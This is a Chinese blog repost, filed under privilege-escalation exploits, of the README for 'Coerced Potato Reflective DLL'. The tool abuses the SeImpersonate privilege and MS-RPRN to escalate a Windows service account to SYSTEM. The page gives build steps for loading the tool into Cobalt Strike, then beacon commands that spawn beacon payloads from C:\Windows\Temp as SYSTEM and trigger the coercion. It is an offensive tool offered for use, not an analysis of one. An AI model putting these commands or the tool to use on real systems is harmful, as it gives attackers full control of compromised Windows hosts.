登录
注册
首页 提权EXP 正文
  • 本文约683字,阅读需3分钟
  • 111
  • 0

Coerced Potato Reflective DLL

Coerced Potato Reflective DLL

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based on https://github.com/Prepouce/CoercedPotato

Reflective Loader from https://github.com/stephenfewer/ReflectiveDLLInjection.

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
 

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
 

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce
 

标签:Coerced Potato
温馨提示:本文最后更新于2024年1月29日 18:20,若内容或图片失效,请在下方留言或联系博主。
  • 本文作者:admins
  • 本文链接:http://caidaome.com/?post=427
  • 版权申明:除非特别说明,否则均为本站原创文章,转载或复制请注明出处。
评论
更换验证码